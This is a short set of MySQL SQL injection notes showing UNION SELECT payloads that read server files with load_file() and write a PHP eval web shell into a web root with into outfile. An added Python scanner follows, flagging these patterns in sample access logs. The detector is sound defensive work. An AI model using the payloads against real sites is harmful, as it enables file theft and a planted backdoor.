MySQL < 5.0
Read files: load_file()
sql-shell select load_file('');
d:/www/xx/index.php
/home/webroot/…../index.php
and 1=2 union select 1,load_file('c:\\..\\sql_inc.php'),3,4…….;
View the page source
Write files: into outfile
and 1=2 union select 1,"<?php @eval($_post['cmd']);?>",3,4 into outfile('c:/Inetpub/wwwroot/xxxxx/test.php')
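Detection side of the two techniques above, as an added example that is not part of the original notes: a small scanner that URL-decodes the request target of each access-log line and flags load_file( reads and into outfile writes arriving through a UNION SELECT. The log lines, the IP address, the /news.php path and the PLACEHOLDER file names are constructed sample data, and the combined-log layout is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format assumed).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=1+and+1=2+'
    'union+select+1,load_file(%27PLACEHOLDER%27),3,4 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=1%20and%201=2%20'
    'union%20select%201,2,3,4%20into%20outfile(%27PLACEHOLDER%27) HTTP/1.1" 200 0',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /download.php?file=report.pdf '
    'HTTP/1.1" 200 1024',
]

# One rule per primitive described in the notes above.
_RULES = {
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+outfile\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}
_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def normalize(target):
    """URL-decode the request target and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(target))


def classify(log_line):
    """Return the sorted names of the rules that match the line's request target."""
    match = _REQUEST.search(log_line)
    if not match:
        return []
    target = normalize(match.group(1))
    return sorted(name for name, rx in _RULES.items() if rx.search(target))


def scan(lines):
    """Return (line number, client address, rule names) for file read/write hits."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = classify(line)
        if "file_read" in hits or "file_write" in hits:
            findings.append((number, line.split(" ", 1)[0], hits))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the request line is inspected here, so parameters sent in a POST body need the same rules applied to application or WAF logs that record the body.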